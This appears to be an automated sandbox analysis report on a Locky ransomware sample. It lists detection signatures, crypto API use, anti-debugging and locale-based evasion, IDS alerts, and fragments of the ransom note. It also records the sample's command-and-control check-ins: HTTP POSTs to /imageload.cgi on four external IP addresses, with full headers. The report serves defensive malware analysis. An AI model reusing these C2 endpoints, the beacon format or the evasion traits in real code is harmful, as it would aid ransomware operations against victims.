Windows Analysis Report
LockyRansom.exe

Overview

General Information

Sample name:	LockyRansom.exe
Analysis ID:	1446225
MD5:	1720b1748ad7b8ac0bfc1c3636fead95
SHA1:	97bae63417df5bde4a05cd44c6c523db50f6ab76
SHA256:	3329641a171508fa6b1ad7674b31431093d46be190d1a51acd77e486f42d9c8e
Tags:	exeLockyRansomware
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

AI detected suspicious sample

Found evasive API chain (may stop execution after checking locale)

Found potential ransomware demand text

Machine Learning detection for sample

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Detected potential crypto function

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

PE file contains sections with non-standard names

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LockyRansom.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: LockyRansom.exe

ReversingLabs: Detection: 95%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: LockyRansom.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00415310 GetLastError,__CxxThrowException@8,CryptAcquireContextA,	0_2_00415310
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,	0_2_00415410
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00416170 CryptReleaseContext,CryptDestroyKey,	0_2_00416170
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_004193D8 CryptReleaseContext,	0_2_004193D8
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,	0_2_0041544C
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040F8D0 CryptReleaseContext,	0_2_0040F8D0
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040F890 CryptReleaseContext,	0_2_0040F890
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040F8B8 CryptReleaseContext,	0_2_0040F8B8
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040F980 CryptGenRandom,__CxxThrowException@8,GetLastError,	0_2_0040F980
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040FB50 CryptDestroyKey,	0_2_0040FB50
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040FB10 CryptDestroyKey,	0_2_0040FB10
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040FBF0 __CxxThrowException@8,CryptEncrypt,GetLastError,	0_2_0040FBF0

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\LockyRansom.exe

Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack

Uses 32bit PE files

Source: LockyRansom.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:

Binary string: gefas.pdb source: LockyRansom.exe

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0042D5D0 FindClose,FindFirstFileW,

0_2_0042D5D0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49704 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49704 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49704 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49705 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49705 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49705 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49706 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49706 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49706 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49708 -> 46.183.165.45:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49708 -> 46.183.165.45:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49708 -> 46.183.165.45:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49709 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49709 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49709 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49710 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49710 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49710 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49711 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49711 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49711 -> 46.17.44.153:80

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: ASBAXETRU ASBAXETRU
Source: Joe Sandbox View	ASN Name: AS-REGRU AS-REGRU
Source: Joe Sandbox View	ASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU IHCRUInternet-HostingLtdMoscowRussiaRU
Source: Joe Sandbox View	ASN Name: WEBHOST1-ASRU WEBHOST1-ASRU

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://37.143.9.154/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 37.143.9.154Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://46.17.44.153/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.17.44.153Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://46.183.165.45/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.183.165.45Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://37.143.9.154/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 37.143.9.154Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://46.17.44.153/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.17.44.153Content-Length: 613Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153

Source: unknown

HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive

Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.179.190.31/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.179.190.31/imageload.cgin
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.179.190.31/imageload.cgir
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imag=
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgiC
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgiP
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgid
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgii
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgilh
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgiy
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgi0
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgi0.31/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgiL
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgiP
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgiV
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgii
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgik
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgiy3
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.1531oad.cgi%880
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.183.165.45/
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.183.165.45/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.183.165.45/imageload.cgia-deddda976288
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.torproject.org/download/download-easy.html

Spam, unwanted Advertisements and Ransom Demands

Found potential ransomware demand text

Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory : All of your files are encrypted with RSA-2048 and AES-128 ciphers.
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory : Decrypting of your files is only possible with the private key and decrypt program, which is on our secret server.
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory : To receive your private key follow one of the links:

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,		0_2_00415410
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,		0_2_0041544C

Detected potential crypto function

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_004022D0	0_2_004022D0
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040A58C	0_2_0040A58C
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_004029C0	0_2_004029C0
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040B2C4	0_2_0040B2C4
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040940E	0_2_0040940E
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040995F	0_2_0040995F
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00409EB0	0_2_00409EB0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: String function: 004182C0 appears 33 times
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: String function: 004761A0 appears 36 times

Uses 32bit PE files

Source: LockyRansom.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal96.rans.evad.winEXE@1/0@0/4

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0040CC4E CoCreateInstance,

0_2_0040CC4E

Source: C:\Users\user\Desktop\LockyRansom.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LockyRansom.exe

ReversingLabs: Detection: 95%

Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: mciwave.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: gfiwave.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\LockyRansom.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: LockyRansom.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: gefas.pdb source: LockyRansom.exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\LockyRansom.exe

Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack .text:ER;.rdata:EW;.dec:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;.cdata:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\LockyRansom.exe

Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004079B0

PE file contains sections with non-standard names

Source: LockyRansom.exe

Static PE information: section name: .dec

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00404705 push ecx; ret	0_2_00404718
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_004029AB push ecx; ret	0_2_004029BB
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00401408 push eax; ret	0_2_00401426

Source: LockyRansom.exe

Static PE information: section name: .rdata entropy: 7.910838175775477

Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\LockyRansom.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0040C58C rdtsc

0_2_0040C58C

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\Desktop\LockyRansom.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\LockyRansom.exe

API coverage: 7.7 %

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0042D5D0 FindClose,FindFirstFileW,

0_2_0042D5D0

Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\LockyRansom.exe

API call chain: ExitProcess graph end node

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0040C58C rdtsc

0_2_0040C58C

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_00405393 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00405393

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004079B0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_005C007E push dword ptr fs:[00000030h]	0_2_005C007E
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_005C03EE push dword ptr fs:[00000030h]	0_2_005C03EE
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0069007E push dword ptr fs:[00000030h]	0_2_0069007E
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_006903EE push dword ptr fs:[00000030h]	0_2_006903EE

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00405393 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00405393
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00403A6C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00403A6C
